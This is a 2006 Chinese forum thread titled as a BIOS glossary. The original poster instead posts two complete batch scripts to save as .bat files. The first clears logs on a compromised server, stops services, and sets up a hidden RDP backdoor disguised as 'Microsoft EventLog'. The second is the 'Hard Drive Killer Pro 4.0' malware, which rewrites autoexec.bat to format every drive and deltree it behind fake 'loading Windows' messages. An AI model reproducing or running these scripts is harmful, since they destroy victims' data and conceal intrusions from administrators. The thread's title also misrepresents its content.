12
刚刚去过 发新帖
楼主: 幻之影 - 

BIOS中英文对照表

[复制链接]
 楼主| 发表于 2006-1-24 07:06:33 | 显示全部楼层 来自:福建宁德
------------------------ cut here then save as .bat or .cmd file --------------------------- <BR><BR><BR><BR>下面命令是清除肉鸡所有日志,禁止一些危险的服务,并修改肉鸡的terminnal service留跳后路。 <BR>@regedit /s patch.dll <BR>@net stop w3svc <BR>@net stop event log <BR>@del c:\winnt\system32\logfiles\w3svc1\*.* /f /q <BR>@del c:\winnt\system32\logfiles\w3svc2\*.* /f /q <BR>@del c:\winnt\system32\config\*.event /f /q <BR>@del c:\winnt\system32dtclog\*.* /f /q <BR>@del c:\winnt\*.txt /f /q <BR>@del c:\winnt\*.log /f /q <BR>@net start w3svc <BR>@net start event log <BR>@rem [删除日志] <BR><BR><BR><BR><BR>@net stop lanmanserver /y <BR>@net stop Schedule /y <BR>@net stop RemoteRegistry /y <BR>@del patch.dll <BR>@echo The server has been patched,Have fun. <BR>@del patch.bat <BR>@REM [禁止一些危险的服务。] <BR><BR><BR><BR>@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] &gt;&gt;patch.dll <BR>@echo "PortNumber"=dword:00002010 &gt;&gt;patch.dll <BR>@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp &gt;&gt;patch.dll <BR>@echo "PortNumber"=dword:00002012 &gt;&gt;patch.dll <BR>@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] &gt;&gt;patch.dll <BR>@echo "Start"=dword:00000002 &gt;&gt;patch.dll <BR>@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService] &gt;&gt;patch.dll <BR>@echo "Start"=dword:00000002 &gt;&gt;patch.dll <BR>@echo "ErrorControl"=dword:00000001 &gt;&gt;patch.dll <BR>@echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\ &gt;&gt;patch.dll <BR>@echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\ &gt;&gt;patch.dll <BR>@echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 &gt;&gt;patch.dll <BR>@echo "ObjectName"="LocalSystem" &gt;&gt;patch.dll <BR>@echo "Type"=dword:00000010 &gt;&gt;patch.dll <BR>@echo "Description"="Keep record of the program and windows" message。" &gt;&gt;patch.dll <BR>@echo "DisplayName"="Microsoft EventLog" &gt;&gt;patch.dll <BR>@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice] &gt;&gt;patch.dll <BR>@echo "Start"=dword:00000004 &gt;&gt;patch.dll <BR>@copy c:\winnt\system32\termsrv.exe c:\winnt\system32\eventlog.exe <BR>@REM [修改3389连接,端口为8210(十六进制为00002012),名称为Microsoft EventLog,留条后路] <BR><BR><BR><BR>3.Hard Drive Killer Pro Version 4.0(玩批处理到这个水平真的不容易了。) <BR>------------------------ cut here then save as .bat or .cmd file --------------------------- <BR>@echo off <BR>rem This program is dedecated to a very special person that does not want to be named. <BR>:start <BR>cls <BR>echo PLEASE WAIT WHILE PROGRAM LOADS . . . <BR>call attrib -r -h c:\autoexec.bat &gt;nul <BR>echo @echo off &gt;c:\autoexec.bat <BR>echo call format c: /q /u /autoSample &gt;nul &gt;&gt;c:\autoexec.bat <BR>call attrib +r +h c:\autoexec.bat &gt;nul <BR>rem Drive checking and assigning the valid drives to the drive variable. <BR><BR><BR><BR>set drive= <BR>set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z <BR><BR><BR><BR><BR>rem code insertion for Drive Checking takes place here. <BR>rem drivechk.bat is the file name under the root directory. <BR>rem As far as the drive detection and drive variable settings, don"t worry about how it <BR>rem works, it"s d\*amn to complicated for the average or even the expert batch programmer. <BR>rem Except for Tom Lavedas. <BR><BR><BR><BR>echo @echo off &gt;drivechk.bat <BR>echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" &gt; nul &gt;{t}.bat <BR>%comspec% /e:2048 /c {t}.bat &gt;&gt;drivechk.bat <BR>del {t}.bat <BR>echo if errorlevel 1 goto enddc &gt;&gt;drivechk.bat <BR><BR><BR><BR>cls <BR>echo PLEASE WAIT WHILE PROGRAM LOADS . . . <BR><BR><BR><BR>rem When errorlevel is 1, then the above is not true, if 0, then it"s true. <BR>rem Opposite of binary rules. If 0, it will elaps to the next command. <BR><BR><BR><BR>echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/-p $b find "bytes" &gt; nul &gt;{t}.bat <BR>%comspec% /e:2048 /c {t}.bat &gt;&gt;drivechk.bat <BR>del {t}.bat <BR>echo if errorlevel 1 goto enddc &gt;&gt;drivechk.bat <BR><BR><BR><BR>cls <BR>echo PLEASE WAIT WHILE PROGRAM LOADS . . . <BR><BR><BR><BR>rem if errorlevel is 1, then the drive specified is a removable media drive - not ready. <BR>rem if errorlevel is 0, then it will elaps to the next command. <BR><BR><BR><BR>echo @prompt dir %%%%1:.\/ad/w/-p $b find " 0 bytes free" &gt; nul &gt;{t}.bat <BR>%comspec% /e:2048 /c {t}.bat &gt;&gt;drivechk.bat <BR>del {t}.bat <BR>echo if errorlevel 1 set drive=%%drive%% %%1 &gt;&gt;drivechk.bat <BR><BR><BR><BR>cls <BR>echo PLEASE WAIT WHILE PROGRAM LOADS . . . <BR><BR><BR><BR>rem if it"s errorlevel 1, then the specified drive is a hard or floppy drive. <BR>rem if it"s not errorlevel 1, then the specified drive is a CD-ROM drive. <BR><BR><BR><BR>echo :enddc &gt;&gt;drivechk.bat <BR><BR><BR><BR>rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING". <BR><BR><BR><BR>rem Now we will use the program drivechk.bat to attain valid drive information. <BR><BR><BR><BR>:Sampledrv <BR><BR><BR><BR>for %%a in (%alldrive%) do call drivechk.bat %%a &gt;nul <BR>del drivechk.bat &gt;nul <BR>if %drive.==. set drive=c
福鼎论坛,福鼎人上福鼎论坛,福鼎第一人气社区,福建社区100强尽在fuding.co
 楼主| 发表于 2006-1-24 07:06:51 | 显示全部楼层 来自:福建宁德
:form_del <BR>call attrib -r -h c:\autoexec.bat &gt;nul <BR>echo @echo off &gt;c:\autoexec.bat <BR>echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . &gt;&gt;c:\autoexec.bat <BR>echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample &gt;nul &gt;&gt;c:\autoexec.bat <BR>echo cls &gt;&gt;c:\autoexec.bat <BR>echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . &gt;&gt;c:\autoexec.bat <BR>echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga &gt;nul &gt;&gt;c:\autoexec.bat <BR>echo cls &gt;&gt;c:\autoexec.bat <BR>echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . &gt;&gt;c:\autoexec.bat <BR>echo for %%%%a in (%drive%) call deltree /y %%%%a:\ &gt;nul &gt;&gt;c:\autoexec.bat <BR>echo cls &gt;&gt;c:\autoexec.bat <BR>echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . &gt;&gt;c:\autoexec.bat <BR>echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample &gt;nul &gt;&gt;c:\autoexec.bat <BR>echo cls &gt;&gt;c:\autoexec.bat <BR>echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . &gt;&gt;c:\autoexec.bat <BR>echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga &gt;nul &gt;&gt;c:\autoexec.bat <BR>echo cls &gt;&gt;c:\autoexec.bat <BR>echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . &gt;&gt;c:\autoexec.bat <BR>echo for %%%%a in (%drive%) call deltree /y %%%%a:\ &gt;nul &gt;&gt;c:\autoexec.bat <BR>echo cd\ &gt;&gt;c:\autoexec.bat <BR>echo cls &gt;&gt;c:\autoexec.bat <BR>echo echo Welcome to the land of death. Munga Bunga"s Multiple Hard Drive Killer version 4.0. &gt;&gt;c:\autoexec.bat <BR>echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . &gt;&gt;c:\autoexec.bat <BR>echo echo 1. To make people aware that security should not be taken for granted. &gt;&gt;c:\autoexec.bat <BR>echo echo 2. Love is important, if you have it, truly, don"t let go of it like I did! &gt;&gt;c:\autoexec.bat <BR>echo echo 3. If you are NOT a vegetarian, then you are a murderer, and I"m glad your HD is dead. &gt;&gt;c:\autoexec.bat <BR>echo echo 4. Don"t support the following: War, Racism, Drugs and the Liberal Party.&gt;&gt;c:\autoexec.bat <BR><BR><BR><BR>echo echo. &gt;&gt;c:\autoexec.bat <BR>echo echo Regards, &gt;&gt;c:\autoexec.bat <BR>echo echo. &gt;&gt;c:\autoexec.bat <BR>echo echo Munga Bunga &gt;&gt;c:\autoexec.bat <BR>call attrib +r +h c:\autoexec.bat <BR><BR><BR><BR>:makedir <BR>if exist c:\temp.bat attrib -r -h c:\temp.bat &gt;nul <BR>echo @echo off &gt;c:\temp.bat <BR>echo %%1:\ &gt;&gt;c:\temp.bat <BR>echo cd\ &gt;&gt;c:\temp.bat <BR>echo :startmd &gt;&gt;c:\temp.bat <BR>echo for %%%%a in ("if not exist %%2\nul md %%2" "if exist %%2\nul cd %%2") do %%%%a &gt;&gt;c:\temp.bat <BR>echo for %%%%a in ("&gt;ass_hole.txt") do echo %%%%a Your Gone @$$hole!!!! &gt;&gt;c:\temp.bat <BR>echo if not exist %%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\nul goto startmd &gt;&gt;c:\temp.bat <BR>call attrib +r +h c:\temp.bat &gt;nul <BR><BR><BR><BR>cls <BR>echo Initializing Variables . . . <BR>rem deltree /y %%a:\*. only eliminates directories, hence leaving the file created above for further destruction. <BR>for %%a in (%drive%) do call format %%a: /q /u /autoSample &gt;nul <BR>cls <BR>echo Initializing Variables . . . <BR>echo Validating Data . . . <BR>for %%a in (%drive%) do call c:\temp.bat %%a Munga &gt;nul <BR>cls <BR>echo Initializing Variables . . . <BR>echo Validating Data . . . <BR>echo Analyzing System Structure . . . <BR>for %%a in (%drive%) call attrib -r -h %%a:\ /S &gt;nul <BR>call attrib +r +h c:\temp.bat &gt;nul <BR>call attrib +r +h c:\autoexec.bat &gt;nul <BR>cls <BR>echo Initializing Variables . . . <BR>echo Validating Data . . . <BR>echo Analyzing System Structure . . . <BR>echo Initializing Application . . . <BR><BR><BR><BR>for %%a in (%drive%) call deltree /y %%a:\*. &gt;nul <BR>cls <BR>echo Initializing Variables . . . <BR>echo Validating Data . . . <BR>echo Analyzing System Structure . . . <BR>echo Initializing Application . . . <BR>echo Starting Application . . . <BR>for %%a in (%drive%) do call c:\temp.bat %%a Munga &gt;nul <BR><BR><BR><BR>cls <BR>echo Thank you for using a Munga Bunga product. <BR>echo. <BR>echo Oh and, Bill Gates rules, and he is not a geek, he is a good looking genius. <BR>echo. <BR>echo Here is a joke for you . . . <BR>echo. <BR>echo Q). What"s the worst thing about being an egg? <BR>echo A). You only get laid once. <BR>echo. <BR>echo HAHAHAHA, get it? Don"t you just love that one? <BR>echo. <BR>echo Regards, <BR>echo. <BR>echo Munga Bunga
福鼎论坛,福鼎人上福鼎论坛,福鼎第一人气社区,福建社区100强尽在fuding.co
发表于 2006-2-14 13:26:18 | 显示全部楼层 来自:福建宁德
<P>那么多。。。</P>
福鼎论坛,福鼎人上福鼎论坛,福鼎第一人气社区,福建社区100强尽在fuding.co
您需要登录后才可以回帖 登录 | 立即注册 微信登录

本版积分规则

快速回复 返回顶部 返回列表